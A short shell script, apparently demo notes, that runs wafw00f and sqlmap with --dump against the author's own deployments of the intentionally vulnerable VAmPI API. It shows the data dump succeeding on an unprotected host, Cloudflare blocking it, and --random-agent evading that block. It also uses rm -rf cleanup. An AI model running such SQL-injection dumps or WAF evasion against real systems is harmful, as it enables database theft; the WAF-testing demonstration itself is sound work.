# pip3 install wafw00f
# pip install --upgrade sqlmap

## Move to location of caching info
cd /home/codespace/.local/share/sqlmap/output

## Prove there is no WAF
wafw00f kvaesvampisecure.azurewebsites.net
## Scan the secure version, no dump
sqlmap -u "https://kvaesvampisecure.azurewebsites.net/users/v1/*admin*" --method=GET --dump
## remove caching info
rm -rf *

## Prove there is no WAF
wafw00f kvaesvampiinsecure.azurewebsites.net
## Scan the insecure version, results in a dump
sqlmap -u "https://kvaesvampiinsecure.azurewebsites.net/users/v1/*admin*" --method=GET --dump
## remove caching info
rm -rf *


## Show that AZ FD WAF is detected
wafw00f kvaesfrontdoorvampi-anbbg2fshsc8cve9.b01.azurefd.net
## Scan the insecure version, results in a dump
sqlmap -u "https://kvaesfrontdoorvampi-anbbg2fshsc8cve9.b01.azurefd.net/users/v1/*admin*" --method=GET --dump
## remove caching info
rm -rf *

## Show CloudFlare is detected
wafw00f vampiinsecure.kvaes.be
## Scan the insecure version, no dump, cloudflare blocks
sqlmap -u "https://vampi.kvaes.be/users/v1/*admin*" --method=GET --dump
## remove caching info
rm -rf *
## Try again with random agents, results in a dump
sqlmap -u "https://vampi.kvaes.be/users/v1/*admin*" --method=GET --dump --random-agent
## remove caching info
rm -rf *
